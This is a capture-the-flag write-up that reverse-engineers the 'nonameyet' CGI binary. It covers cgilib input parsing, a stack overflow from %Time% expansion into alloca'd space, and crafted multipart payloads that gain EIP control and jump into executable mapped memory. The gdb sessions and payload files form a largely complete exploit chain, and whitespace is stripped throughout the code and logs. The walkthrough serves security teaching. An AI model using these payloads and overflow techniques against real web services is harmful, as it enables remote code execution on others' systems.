int__usercallmain@<eax>(char*a1@<esi>){intresult;// eax@2void*v2;// eax@15intv3;// [sp+1Ch] [bp-4Ch]@1intv4;// [sp+20h] [bp-48h]@9intv5;// [sp+24h] [bp-44h]@5intv6;// [sp+28h] [bp-40h]@9intv7;// [sp+2Ch] [bp-3Ch]@5intv8;// [sp+30h] [bp-38h]@9intv9;// [sp+34h] [bp-34h]@5intv10;// [sp+38h] [bp-30h]@9intv11;// [sp+3Ch] [bp-2Ch]@5intv12;// [sp+40h] [bp-28h]@9intv13;// [sp+44h] [bp-24h]@5intv14;// [sp+48h] [bp-20h]@9size_tfile_size;// [sp+4Ch] [bp-1Ch]@1constvoid*v16;// [sp+50h] [bp-18h]@1void*s_cgi;// [sp+54h] [bp-14h]@1intphoto;// [sp+58h] [bp-10h]@1intv19;// [sp+5Ch] [bp-Ch]@1v16=0;file_size=0;s_cgi=0;photo=0;v19=0;memset(&v3,0,0x30u);s_cgi=cgiInit();v19=open("./photos",0);if(v19==-1){write_headers();printf("<p>ERROR: 900</p>");result=0;}elseif(fchdir(v19)==-1){write_headers();printf("<p>ERROR: 901</p>");close(v19);result=0;}else{close(v19);photo=cgiGetFile((int)s_cgi,"photo");v3=cgiGetValue((int)s_cgi,"base");v7=cgiGetValue((int)s_cgi,"time");v9=cgiGetValue((int)s_cgi,"date");v11=cgiGetValue((int)s_cgi,"pixy");v13=cgiGetValue((int)s_cgi,"pixx");v5=cgiGetValue((int)s_cgi,"genr");if(photo){if(!v3)v3=*(_DWORD*)(photo+8);v4=urldecode(v3);v8=urldecode(v7);v6=urldecode(v5);v10=urldecode(v9);v12=urldecode(v11);v14=urldecode(v13);v16=read_file(*(char**)(photo+12),(int)&file_size);if(v16){if(file_size){if((interesting((int)&file_size,a1,(int)&v3)&0x80000000)==0){v2=base64encode(v3,v4);combine_strings("Cookie",v2);write_headers();cgiFree(s_cgi);v19=open((constchar*)v3,66,420);if(v19==-1){printf("<p>ERROR: 906</p>",v3);}else{write(v19,v16,file_size);close(v19);}printf("<meta http-equiv='refresh' content='0;url=../thanks.php'>");result=0;}else{write_headers();printf("<p>ERROR: 905</p>");result=0;}}else{write_headers();printf("<p>ERROR: 904. Why the hell would you give me an empty file</p>");result=0;}}else{write_headers();printf("<p>ERROR: 903</p>");result=0;}}else{write_headers();printf("<p>ERROR: 902</p>");result=0;}}returnresult;}

When looking at a CTF problem, you should always be asking yourself “What is happening with my input?” Most of the parsing happens right up front in the cgiInit() function. This function will read and parse CGI input and set up the s_cgi structure. This function first checks for the environment variable CONTENT_TYPE. CGI input is usually passed via environment variables and stdin from the webserver. If this environment variable is not set then the program will read variables from stdin.

If the CONTENT_TYPE variable is set to “multipart/form-data” it will parse out a boundary condition from the variable and call off into the cgiReadMultipart() function before returning. If the CONTENT_TYPE variable is anything else, the program then looks for the REQUEST_METHOD and CONTENT_LENGTH environment variables.

For a REQUEST_METHOD of “GET” the environment variable QUERY_STRING is parsed and for a REQUEST_METHOD of “POST” stdin is parsed. If none of these are specified then the cgiReadVariables() function will prompt for input from the command line. This is very handy for quick testing. The cgiInit() function will also parse cookie information. All of this was learned by reading the cgilib source code for cgiInit().

We have five code paths for parsing our input: multipart, get, post, stdin, and cookies. All of these are standard in cgilib. Which code path should we explore first? Let’s start with the simplest form, no environment variables, and data parsed directly from stdin.

$python-c"print 'asdf=asdf'"|./nonameyet.cgi(offlinemode:entername=valuepairsonstandardinput)Content-type:text/html<p>ERROR:902</p>

Here we just set a variable asdf = asdf and we are returned error 902, the same as if we passed in no input. Looking back to main() we can easily spot where “ERROR: 902” is printed inside of an else block. Look up to the if condition on that else block and we see that this is because photo = cgiGetFile((int)s_cgi, “photo”); returned NULL. Setting the photo variable from stdin also produces the same error. The cgiGetFile() call did not find a variable called photo registered in the s_cgi structure. There is another interesting behavior here if we set the same variable twice:

$python-c"print 'asdf=asdf\nasdf=asdf'"|./nonameyet.cgi(offlinemode:entername=valuepairsonstandardinput)Segmentationfault(coredumped)

Crashes are usually really good in a CTF competition. Going into this with a debugger we find:

$gdb./nonameyet.cgiReadingsymbolsfrom./nonameyet.cgi...(nodebuggingsymbolsfound)...done.gdb-peda$rStartingprogram:/home/bool/nonameyet.cgi(offlinemode:entername=valuepairsonstandardinput)asdf=asdfasdf=asdfProgramreceivedsignalSIGSEGV,Segmentationfault.[----------------------------------registers-----------------------------------]EAX:0x0EBX:0x4ECX:0xb7fcf448-->0x8050080-->0x66('f')EDX:0x8050078("asdf\nasdf")ESI:0x0EDI:0x805008d-->0x0EBP:0xbffff668-->0xbffff698-->0xbffff708-->0x0ESP:0xbffff590-->0x0EIP:0x804bb5d(movedx,DWORDPTR[eax+0x4])EFLAGS:0x10206(carryPARITYadjustzerosigntrapINTERRUPTdirectionoverflow)[-------------------------------------code-------------------------------------]0x804bb52:shleax,0x20x804bb55:addeax,DWORDPTR[ebp-0x84]0x804bb5b:moveax,DWORDPTR[eax]=>0x804bb5d:movedx,DWORDPTR[eax+0x4]0x804bb60:moveax,DWORDPTR[ebp-0x98]0x804bb66:shleax,0x20x804bb69:addeax,DWORDPTR[ebp-0x84]0x804bb6f:moveax,DWORDPTR[eax][------------------------------------stack-------------------------------------]0000|0xbffff590-->0x00004|0xbffff594-->0x804d483("%s\n%s")0008|0xbffff598-->0x8050058-->0x00012|0xbffff59c-->0x8050088-->0x8050050-->0x00016|0xbffff5a0-->0xb7fff55c-->0xb7fde000-->0x464c457f0020|0xbffff5a4-->0x30024|0xbffff5a8-->0x00028|0xbffff5ac-->0xffffffff[------------------------------------------------------------------------------]Legend:code,data,rodata,valueStoppedreason:SIGSEGV0x0804bb5din??()gdb-peda$

I should mention that I am using PEDA with GDB. It makes exploit development tasks a lot easier than standard GDB. I encourage you to check it out and explore how it works. Anyway, this is a NULL pointer dereference crash. The register EAX is being dereferenced. EAX is NULL. As a result, the program sends a signal 11 or SIGSEGV and we terminate execution. The buggy code seems to be in cgilib/cgi.c on line 644 when they attempt to do:

644:cgiDebugOutput(1,"%s: %s",result[i]->name,result[i]->value);

It looks to me like they used the incorrect index into the result array. There is another index counter called k used earlier in the code that accounts for duplicate variable name. My guess is that this line was simply copy and pasted from line 630 and the developers did not change ‘i’ to ‘k’. Either way, I am not sure if a web server would ever generate input to a CGI program like this, and unless we can somehow allocate the NULL address space on the remote server, this is not likely to be an interesting crash when solving the CTF problem. Interesting, but ultimately useless.

Back to our problem. The photo variable is NULL. Looking back in cgi.c source code for cgiGetFile() it is easy to spot that this information comes from s_cgi->files. Ok, that makes sense. However, the only code path that sets this information is when we have a CONTENT_TYPE of “multipart/form-data”. This was discovered with a quick grep for “->files” in the cgilib source code to find something that writes to this variable. The one place this happens is in the cgiReadMultipart() function. Let’s jump into feeding this program multipart data.

I used Wireshark to perform a packet capture on the data that was being sent by my browser when submitting a form to nonameyet.cgi. After all, the browser should already generate everything we need. With a quick copy and paste and setting up lines to end with \r\n instead of \n I now have the following setup to get multipart data parsed by the CGI program:

$exportCONTENT_TYPE="Content-Type: multipart/form-data; boundary=---------------------------13141138687192"$catformdata-----------------------------13141138687192Content-Disposition:form-data;name="photo";filename="test"Content-Type:application/octet-streamtest-----------------------------13141138687192--

Remember each line ends with \r\n. After I set up the formdata file and my environment variable, let’s see if we can get past that error 902 output. I will also turn on the debug output with the debugger after breaking on main():

$gdb./nonameyet.cgiReadingsymbolsfrom./nonameyet.cgi...(nodebuggingsymbolsfound)...done.gdb-peda$break*0x0804906DBreakpoint1at0x804906dgdb-peda$setargs<formdatagdb-peda$rStartingprogram:/home/bool/nonameyet.cgi<formdataBreakpoint1,0x0804906din??()gdb-peda$set{int}0x804F0DC=1000gdb-peda$cContinuing.Content-Type:Content-Type:multipart/form-data;boundary=---------------------------13141138687192Readline'-----------------------------13141138687192'Readline'Content-Disposition:form-data;name="photo";filename="test"'FoundfieldnamephotoFoundfilenametestReadline'Content-Type:application/octet-stream'Foundmimetypeapplication/octet-streamReadline''Wrotephoto(test)tofile:/tmp/cgilibWFDOKJReadline'-----------------------------13141138687192'photofoundastestContent-type:text/htmlCookie:YmFzZQA=<metahttp-equiv='refresh'content='0;url=../thanks.php'>[Inferior1(process7579)exitednormally]

That looks pretty good! In truth, it took a bit of playing around to get to this point. Now we have everything specified in our form being read. The file contents were written and parsed and if we look in the /photos directory we see a file named base with the contents test:

$lsphotos/base$catphotos/basetest

Where is the bug? If you look back up in the main() function you will see a subroutine I labeled “interesting”. The only way to get to this function is to have a valid photo returned from cgiGetFile(). Here is the decompiled source code for the interesting function:

unsignedint__usercallinteresting@<eax>(intedi0@<edi>,char*a2@<esi>,inta1){unsignedintresult;// eax@1void*v4;// esp@2charv5;// bl@3intv6;// edx@3intv7;// ecx@3void*v8;// esp@4intv9;// ecx@7unsignedintv10;// ecx@8void*v11;// edi@9unsignedintv12;// ecx@11void*v13;// edi@12unsignedintv14;// ecx@14void*v15;// edi@15unsignedintv16;// ecx@17void*v17;// edi@18unsignedintv18;// ecx@20void*v19;// edi@21intv20;// eax@25intv21;// [sp+0h] [bp-20h]@2unsignedintcounter_1;// [sp+8h] [bp-18h]@1constvoid*esp_ptr;// [sp+Ch] [bp-14h]@2intfile_name_size;// [sp+10h] [bp-10h]@2intfilename;// [sp+14h] [bp-Ch]@2inttype_mult_2;// [sp+18h] [bp-8h]@2intcounter;// [sp+1Ch] [bp-4h]@1result=0;counter=0;counter_1=0;if(a1){file_name_size=*(_DWORD*)(a1+4);type_mult_2=2*file_name_size;v4=alloca(2*file_name_size);esp_ptr=&v21;filename=*(_DWORD*)a1;while(1){while(1){v5=*(_BYTE*)(counter+filename);v6=counter+++filename+1;v7=type_mult_2;if(type_mult_2<=(signedint)counter_1){v8=alloca(type_mult_2);qmemcpy(&v21,&v21,type_mult_2);a2=(char*)&v21+v7;edi0=(int)((char*)&v21+v7);esp_ptr=&v21;type_mult_2*=2;}if(v5!='%'||*(_BYTE*)(v6+4)!='%'){*((_BYTE*)esp_ptr+counter_1++)=v5;gotoLABEL_24;}v9=*(_DWORD*)v6;v6+=5;counter+=5;if(v9!='rneG')break;v10=*(_DWORD*)(a1+12);a2=*(char**)(a1+8);if(a2){v11=(char*)esp_ptr+counter_1;counter_1+=v10;qmemcpy(v11,a2,v10);a2+=v10;edi0=(int)((char*)v11+v10);LABEL_24:if(file_name_size<=counter){v20=mmap(v6,edi0,(int)a2);qmemcpy((void*)v20,esp_ptr,counter_1);*(_DWORD*)a1=v20;result=counter_1;*(_DWORD*)(a1+4)=counter_1;returnresult;}}}switch(v9){case'emiT':v12=*(_DWORD*)(a1+20);a2=*(char**)(a1+16);if(a2){v13=(char*)esp_ptr+counter_1;counter_1+=v12;qmemcpy(v13,a2,v12);a2+=v12;edi0=(int)((char*)v13+v12);gotoLABEL_24;}break;case'etaD':v14=*(_DWORD*)(a1+28);a2=*(char**)(a1+24);if(a2){v15=(char*)esp_ptr+counter_1;counter_1+=v14;qmemcpy(v15,a2,v14);a2+=v14;edi0=(int)((char*)v15+v14);gotoLABEL_24;}break;case'YxiP':v16=*(_DWORD*)(a1+36);a2=*(char**)(a1+32);if(a2){v17=(char*)esp_ptr+counter_1;counter_1+=v16;qmemcpy(v17,a2,v16);a2+=v16;edi0=(int)((char*)v17+v16);gotoLABEL_24;}break;case'XxiP':v18=*(_DWORD*)(a1+44);a2=*(char**)(a1+40);if(a2){v19=(char*)esp_ptr+counter_1;counter_1+=v18;qmemcpy(v19,a2,v18);a2+=v18;edi0=(int)((char*)v19+v18);gotoLABEL_24;}break;}}}returnresult;}

There are a few things that jump out at me right away. The first is the use of the alloca() function. The man page for alloca states “The alloca() function allocates size bytes of space in the stack frame of the caller. This temporary space is automatically freed when the function that called alloca() returns to its caller.” Thus, we are dynamically growing the stack based upon file_name_size. This function call ends up being just a “sub esp” instruction in the assembly code, so don’t expect to see an import to alloca in the ELF header.

The next thing I notice are the case statements looking for 4 character string patterns of: Genr, Time, Date, PixY, and PixX. IDA shows these in little endian (backwards) format. The program checks for % characters in the filename input that are followed by another % character 4 character later. Thus, we are looking for DOS style variables like %Genr%. It turns out all of these variables are passed in as the third argument to the interesting function.

They are built into a structure that is 0x30 bytes long. First the sizes are built with calls to v3 = cgiGetValue((int)s_cgi, “base”); and the like. Then the strings for the variables are built immediately before the sizes. The IDA decompilation of the main function does not identify this as a structure. However, the memset(&v3, 0, 0x30u); and the fact that only v3 is passed into a function that clearly needs all of these variables is a big clue that this is a structure, or an array of structures, instead of 12 individual variables. The v3 variable in main() (or a1 in interesting()) ends up looking like this:

structv3{char*filename;unsignedintfile_name_size;char*genr_str;unsignedintgenr_size;char*time_str;unsignedinttime_size;char*date_str;unsignedintdate_size;char*pixy_str;unsignedintpixy_size;char*pixx_str;unsignedintpixx_size;};

Have you spotted the bug yet? If not, go back to what is happening with our input in the interesting function. We pass this structure into our function, alloca (file_name_size * 2) and then what? We start copying into this array. It’s the qmemcpy calls that are in question here. These are presented in assembly as rep movsb instructions. Ask yourself how much data is being copied and what is the size of the destination buffer? Do you control the data being copied into the buffer? What variables are being updated in the loops to affect the starting offsets of the copy? Study the code and see if you can answer some of these questions. Do it now, I will wait.

Vulnerability Discovery

What you might notice is that after the program takes the length of file_name, doubles it, and allocates that amount of space on the stack, it will then proceed to copy in the values for the other variables from the structure. For example, if I set the filename “foobar” (name=”photo”; filename=”foobar” in my formdata file) and then if I set the Time input to be AAAAAA the CGI program will allocate 14 bytes on the stack (length of “foobar\0” * 2) and then copy in the value of the %Time% variable, which would also be 6 bytes. This will be clearer when looking at the actual input file.

The bug comes in if we make the length of Time larger than the length of file_name while having file_name reference %Time%. There is no check to see if we have enough stack space left. This is a stack overflow. The only issue is that if we try to encode a %Time% variable directly into the file_name then the program never gets to the interesting function! For clarity, this is what the formdata file looks like now for testing:

-----------------------------13141138687192Content-Disposition:form-data;name="photo";filename="%Time%"Content-Type:application/octet-streamfilecontents-----------------------------13141138687192-----------------------------13141138687192Content-Disposition:form-data;name="Time"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-----------------------------13141138687192--

The %Time% bit does not parse correctly and we miss the check for % in the filename. This is because the variables are being URL decoded. If I set it to %25Time%25 it will decode properly as %Time% (0x25 = ‘%’). The other problem I ran into with this input is that although the %Time% variable is case sensitive when the time pointers and sizes are actually set in the structure it is looked up with lower case only. So, name=”time” and filename=”%25Time%25” will produce the following crash:

$gdb./nonameyet.cgiReadingsymbolsfrom./nonameyet.cgi...(nodebuggingsymbolsfound)...done.gdb-peda$setargs<formdatagdb-peda$rStartingprogram:/home/bool/nonameyet.cgi<formdataProgramreceivedsignalSIGSEGV,Segmentationfault.[----------------------------------registers-----------------------------------]EAX:0xb7fd9000-->0x0EBX:0x1000ECX:0x41414141('AAAA')EDX:0x80500a6-->0x0ESI:0x41414141('AAAA')EDI:0xb7fd9000-->0x0EBP:0xbffff638('A'<repeats46times>)ESP:0xbffff60a('A'<repeats92times>)EIP:0x804cfa2(repmovsBYTEPTRes:[edi],BYTEPTRds:[esi])EFLAGS:0x10206(carryPARITYadjustzerosigntrapINTERRUPTdirectionoverflow)[-------------------------------------code-------------------------------------]0x804cf9a:movedi,eax0x804cf9c:movesi,DWORDPTR[ebp-0x14]0x804cf9f:movecx,DWORDPTR[ebp-0x18]=>0x804cfa2:repmovsBYTEPTRes:[edi],BYTEPTRds:[esi]0x804cfa4:movebx,DWORDPTR[ebp+0x8]0x804cfa7:movDWORDPTR[ebx],eax0x804cfa9:moveax,DWORDPTR[ebp-0x18]0x804cfac:movDWORDPTR[ebx+0x4],eax[------------------------------------stack-------------------------------------]0000|0xbffff60a('A'<repeats92times>)0004|0xbffff60e('A'<repeats88times>)0008|0xbffff612('A'<repeats84times>)0012|0xbffff616('A'<repeats80times>)0016|0xbffff61a('A'<repeats76times>)0020|0xbffff61e('A'<repeats72times>)0024|0xbffff622('A'<repeats68times>)0028|0xbffff626('A'<repeats64times>)[------------------------------------------------------------------------------]Legend:code,data,rodata,valueStoppedreason:SIGSEGV0x0804cfa2in??()gdb-peda$

Huzzah! We’ve exercised the stack overflow and crashed on a memcpy(). If we can get the function to return we will have control over EIP. We are actually really close to the function return at this point as well. The ret instruction is at 0x0804CFB0, just a short 14 bytes away.

Let’s see if we can get around this crash. The rep movs instruction will move ECX number of bytes from the pointer in ESI to the pointer in EDI. Here, ECX is set to 0x41414141. Clearly we overwrote the size used in this copy. We could look at the stack frame and do the math with the allocas to figure out exactly which offset the counter is coming from, but it is faster to just put in a string pattern in the time variable.

We run it again with formdata of:

$catformdata-----------------------------13141138687192Content-Disposition:form-data;name="photo";filename="%25Time%25"Content-Type:application/octet-streamfilecontents-----------------------------13141138687192Content-Disposition:form-data;name="time"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV-----------------------------13141138687192

Debugging this gives us the following:

$gdb./nonameyet.cgiReadingsymbolsfrom./nonameyet.cgi...(nodebuggingsymbolsfound)...done.gdb-peda$setargs<formdatagdb-peda$rStartingprogram:/home/bool/nonameyet.cgi<formdataProgramreceivedsignalSIGSEGV,Segmentationfault.[----------------------------------registers-----------------------------------]EAX:0xb7fd9000-->0x0EBX:0x1000ECX:0x47474646('FFGG')EDX:0x80500a6-->0x0ESI:0x48484747('GGHH')EDI:0xb7fd9000-->0x0EBP:0xbffff638("LLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV")ESP:0xbffff60a("AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV")EIP:0x804cfa2(repmovsBYTEPTRes:[edi],BYTEPTRds:[esi])EFLAGS:0x10206(carryPARITYadjustzerosigntrapINTERRUPTdirectionoverflow)[-------------------------------------code-------------------------------------]0x804cf9a:movedi,eax0x804cf9c:movesi,DWORDPTR[ebp-0x14]0x804cf9f:movecx,DWORDPTR[ebp-0x18]=>0x804cfa2:repmovsBYTEPTRes:[edi],BYTEPTRds:[esi]0x804cfa4:movebx,DWORDPTR[ebp+0x8]0x804cfa7:movDWORDPTR[ebx],eax0x804cfa9:moveax,DWORDPTR[ebp-0x18]0x804cfac:movDWORDPTR[ebx+0x4],eax[------------------------------------------------------------------------------]Stoppedreason:SIGSEGV0x0804cfa2in??()gdb-peda$

We can go back to our input file and replace the “FFGG” with NULLS so that no copy is executed. My first attempt was to inject raw NULL bytes into this file. I ran the following python script to get the job done. It’s not pretty, but it worked. I could also have used vi with %!xxd and %!xxd –r or any other hex editor to makes these changes.

$pythonPython2.7.5+(default,Feb272014,19:39:55)[GCC4.8.1]onlinux2Type"help","copyright","credits"or"license"formoreinformation.>>>a=open("formdata","rb")>>>t=a.read()>>>t.find("FFGG")286>>>l=t.find("FFGG")>>>t[l:l+4]'FFGG'>>>defstrow(instr,owstr,offset):...returninstr[:offset]+owstr+instr[offset+len(owstr):]...>>>p=strow(t,"\0\0\0\0",286)>>>y=open("file2","wb")>>>y.write(p)>>>y.close()

While the python script properly modified the file, this technique did not work. ECX, instead of NULL, was set to 0x2d2d2d2d or “—-“. This value is coming from our boundary on the multipart data. I assumed that because we used NULL bytes that they must be causing early termination of string parsing routines. What if we URL encode the NULL bytes?

Setting the time variable to “AAAABBBBCCCCDDDDEEEEFF%00%00%00%00GGHHHHIIII” and debugging once again yields:

$gdb./nonameyet.cgiReadingsymbolsfrom./nonameyet.cgi...(nodebuggingsymbolsfound)...done.gdb-peda$setargs<formdatagdb-peda$rStartingprogram:/home/bool/nonameyet.cgi<formdataContent-type:text/htmlCookie:AA==<p>ERROR:906</p><metahttp-equiv='refresh'content='0;url=../thanks.php'>[Inferior1(process1834)exitednormally]Warning:notrunningortargetisremotegdb-peda$

Well that was a step in the wrong direction! There is no crash now. We are seeing the ERROR: 906 coming back, which is what happens when the photo file being uploaded fails to open. The cookie coming back to us in the HTTP header is the name of this file. The base64 decoding of “AA==“ is 0x00, so it is understandable that that file did not open. I think we are running into similar issues with the string parsing again. This is as far as I got during the actual CTF.

It was not until afterwards that it was pointed out to me that we can double URL encode the NULL values. If URL encoding once makes 0x00 = %00 then URL encoding twice will be 0x00 = %00 = %25%30%30. With my formdata file now looking like this:

-----------------------------13141138687192Content-Disposition:form-data;name="photo";filename="%25Time%25"Content-Type:application/octet-streamfilecontents-----------------------------13141138687192Content-Disposition:form-data;name="time"AAAABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP-----------------------------13141138687192

We get a debugger output of:

$gdb./nonameyet.cgiReadingsymbolsfrom./nonameyet.cgi...(nodebuggingsymbolsfound)...done.gdb-peda$setargs<formdatagdb-peda$rStartingprogram:/home/bool/nonameyet.cgi<formdataProgramreceivedsignalSIGSEGV,Segmentationfault.[----------------------------------registers-----------------------------------]EAX:0xb7fd9000-->0x0EBX:0x4f4f4e4e('NNOO')ECX:0x0EDX:0x80500a6-->0x0ESI:0x48484747('GGHH')EDI:0xb7fd9000-->0x0EBP:0xbffff638("LLMMMMNNNNOOOOPPPP")ESP:0xbffff60a("AAAABBBBCCCCDDDDEEEEFF")EIP:0x804cfa7(movDWORDPTR[ebx],eax)EFLAGS:0x10206(carryPARITYadjustzerosigntrapINTERRUPTdirectionoverflow)[-------------------------------------code-------------------------------------]0x804cf9f:movecx,DWORDPTR[ebp-0x18]0x804cfa2:repmovsBYTEPTRes:[edi],BYTEPTRds:[esi]0x804cfa4:movebx,DWORDPTR[ebp+0x8]=>0x804cfa7:movDWORDPTR[ebx],eax0x804cfa9:moveax,DWORDPTR[ebp-0x18]0x804cfac:movDWORDPTR[ebx+0x4],eax0x804cfaf:leave0x804cfb0:ret[------------------------------------stack-------------------------------------]0000|0xbffff60a("AAAABBBBCCCCDDDDEEEEFF")0004|0xbffff60e("BBBBCCCCDDDDEEEEFF")0008|0xbffff612("CCCCDDDDEEEEFF")0012|0xbffff616("DDDDEEEEFF")0016|0xbffff61a("EEEEFF")0020|0xbffff61e-->0x4646('FF')0024|0xbffff622-->0x47470000('')0028|0xbffff626("HHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP")[------------------------------------------------------------------------------]Legend:code,data,rodata,valueStoppedreason:SIGSEGV0x0804cfa7in??()gdb-peda$

Awesome, we got past the rep movs with a NULL ECX and we are now 9 bytes away. The crash is now on the instruction 0x804cfa7: mov DWORD PTR [ebx],eax where EBX is 0x4f4f4e4e. We are writing EAX to this pointer. We can set this to be anywhere in memory that is writeable to avoid this crash. At the offset for “NNOO” let’s put in 0x0804F0EC, which is just past the end of the .BSS section. That address is mapped into our memory space and will be NULL and unused throughout the program. We will need to little endian encode and URL encode this pointer resulting in: %EC%F0%04%08.

Now with a formdata file of:

$catformdata-----------------------------13141138687192Content-Disposition:form-data;name="photo";filename="%25Time%25"Content-Type:application/octet-streamfilecontents-----------------------------13141138687192Content-Disposition:form-data;name="time"AAAABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMMMMNN%EC%F0%04%08OOPPPP-----------------------------13141138687192

We get a debugger output of:

$gdb./nonameyet.cgiReadingsymbolsfrom./nonameyet.cgi...(nodebuggingsymbolsfound)...done.gdb-peda$setargs<formdatagdb-peda$rStartingprogram:/home/bool/nonameyet.cgi<formdataProgramreceivedsignalSIGSEGV,Segmentationfault.[----------------------------------registers-----------------------------------]EAX:0x0EBX:0x804f0ec-->0xb7fd9000-->0x0ECX:0x0EDX:0x80500a6-->0x0ESI:0x48484747('GGHH')EDI:0xb7fd9000-->0x0EBP:0x4d4d4c4c('LLMM')ESP:0xbffff640-->0x804f0ec-->0xb7fd9000-->0x0EIP:0x4e4e4d4d('MMNN')EFLAGS:0x10206(carryPARITYadjustzerosigntrapINTERRUPTdirectionoverflow)[-------------------------------------code-------------------------------------]Invalid$PCaddress:0x4e4e4d4d[------------------------------------stack-------------------------------------]0000|0xbffff640-->0x804f0ec-->0xb7fd9000-->0x00004|0xbffff644("OOPPPP")0008|0xbffff648-->0xff0050500012|0xbffff64c-->0x10016|0xbffff650-->0xb7e2bb98-->0x2a5c('\\*')0020|0xbffff654-->0xb7fdc858-->0xb7e1f000-->0x464c457f0024|0xbffff658-->0xbffff866("/home/bool/nonameyet.cgi")0028|0xbffff65c-->0x80500a0("%Time%")[------------------------------------------------------------------------------]Legend:code,data,rodata,valueStoppedreason:SIGSEGV0x4e4e4d4din??()gdb-peda$

Excellent! EIP: 0x4e4e4d4d. I can now control the next instruction that this program executes. Our goal is to send EIP back to a buffer that we control. Let’s find everywhere in memory that our input string exists:

gdb-peda$searchmemAAAABBBBSearchingfor'AAAABBBB'in:NonerangesFound3results,displaymax3items:[heap]:0x80501b8("AAAABBBBCCCCDDDDEEEEFF")mapped:0xb7fda108("AAAABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMMMMNN%EC%F0%04%08OOPPPP\r\n",'-'<repeats29times>,"13141138687192--\r\n")[stack]:0xbffff60a("AAAABBBBCCCCDDDDEEEEFF")gdb-peda$vmmapStartEndPermName0x080480000x0804e000r-xp/home/bool/nonameyet.cgi0x0804e0000x0804f000r-xp/home/bool/nonameyet.cgi0x0804f0000x08050000rwxp/home/bool/nonameyet.cgi0x080500000x08071000rwxp[heap]0xb7e1e0000xb7e1f000rwxpmapped0xb7e1f0000xb7fcd000r-xp/lib/i386-linux-gnu/libc-2.17.so0xb7fcd0000xb7fcf000r-xp/lib/i386-linux-gnu/libc-2.17.so0xb7fcf0000xb7fd0000rwxp/lib/i386-linux-gnu/libc-2.17.so0xb7fd00000xb7fd3000rwxpmapped0xb7fd90000xb7fdd000rwxpmapped0xb7fdd0000xb7fde000r-xp[vdso]0xb7fde0000xb7ffe000r-xp/lib/i386-linux-gnu/ld-2.17.so0xb7ffe0000xb7fff000r-xp/lib/i386-linux-gnu/ld-2.17.so0xb7fff0000xb8000000rwxp/lib/i386-linux-gnu/ld-2.17.so0xbffdf0000xc0000000rwxp[stack]

I have three choices for direct execution: heap, mapped, or stack. All of the sections are executable. If I run the binary again and do the same search we can determine if any of these sections are affected by ASLR. They all looked stable between runs to me. Remember this for later.

My preference is to use the mapped section because it looks like it has a complete copy of the data exactly as I sent it in. Other options here are to look for more input vectors, specifically cookies and other variables. Let’s use python again to set the “AAAA” in our input to \xcc\xcc\xcc\xcc so that we might trigger an int 3 debugging break point.

Next, let’s overwrite the “MMNN” offset that was in EIP with the little endian URL encoded address of %08%a1%fd%b7 (0xb7fda108) that should point directly to the start of our data (int 3) in the mapped section. If all goes well, we should expect to see a SIGTRAP.

The formdata file is:

$catformdata-----------------------------13141138687192Content-Disposition:form-data;name="photo";filename="%25Time%25"Content-Type:application/octet-streamfilecontents-----------------------------13141138687192Content-Disposition:form-data;name="time"▒▒▒▒BBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMM%08%a1%fd%b7%EC%F0%04%08OOPPPP-----------------------------13141138687192

The debugger output is:

$gdb./nonameyet.cgiReadingsymbolsfrom./nonameyet.cgi...(nodebuggingsymbolsfound)...done.gdb-peda$setargs<formdatagdb-peda$rStartingprogram:/home/bool/nonameyet.cgi<formdataProgramreceivedsignalSIGTRAP,Trace/breakpointtrap.[----------------------------------registers-----------------------------------]EAX:0x0EBX:0x804f0ec-->0xb7fd9000-->0x0ECX:0x0EDX:0x80500a6-->0x0ESI:0x48484747('GGHH')EDI:0xb7fd9000-->0x0EBP:0x4d4d4c4c('LLMM')ESP:0xbffff640-->0x804f0ec-->0xb7fd9000-->0x0EIP:0xb7fda109-->0x42ccccccEFLAGS:0x206(carryPARITYadjustzerosigntrapINTERRUPTdirectionoverflow)[-------------------------------------code-------------------------------------]0xb7fda0fc:gs0xb7fda0fd:cmpeax,0x6d6974220xb7fda102:andcl,BYTEPTRgs:0xcc0a0d0a=>0xb7fda109:int30xb7fda10a:int30xb7fda10b:int30xb7fda10c:incedx0xb7fda10d:incedx[------------------------------------stack-------------------------------------]0000|0xbffff640-->0x804f0ec-->0xb7fd9000-->0x00004|0xbffff644("OOPPPP")0008|0xbffff648-->0xff0050500012|0xbffff64c-->0x10016|0xbffff650-->0xb7e2bb98-->0x2a5c('\\*')0020|0xbffff654-->0xb7fdc858-->0xb7e1f000-->0x464c457f0024|0xbffff658-->0xbffff866("/home/bool/nonameyet.cgi")0028|0xbffff65c-->0x80500a0("%Time%")[------------------------------------------------------------------------------]Legend:code,data,rodata,valueStoppedreason:SIGTRAP0xb7fda109in??()gdb-peda$

Great! We have arbitrary code execution now. Unfortunately, the start of our string only affords us 22 bytes of execution before we run into the NULL encoded ECX register from earlier. We now have two options. The first is to make the filename larger than %25Time%25 so that more stack is allocated and our offsets are further into the file. The second option I see is to encode a short relative jump instruction in place of the int 3. Because we are doing this from a flat file and not an exploit script it would be very easy to lose track of shifting offsets, so I opted for the second option.

Currently, the start of the “OOPP” that ends our input string is 105 bytes away. I can encode a jump as %eb%67 to jump +105 bytes forward and land right on my data. After a bit of trial and error building the input file I was able to line everything up just right and gain code execution when running in gdb. I simply replaced the “OOPPPP” with my shellcode to open /home/nonameyet/flag, read it to the stack, and write it to stdout. Note that this shellcode would not trigger the .bash_alias backdoor from earlier!

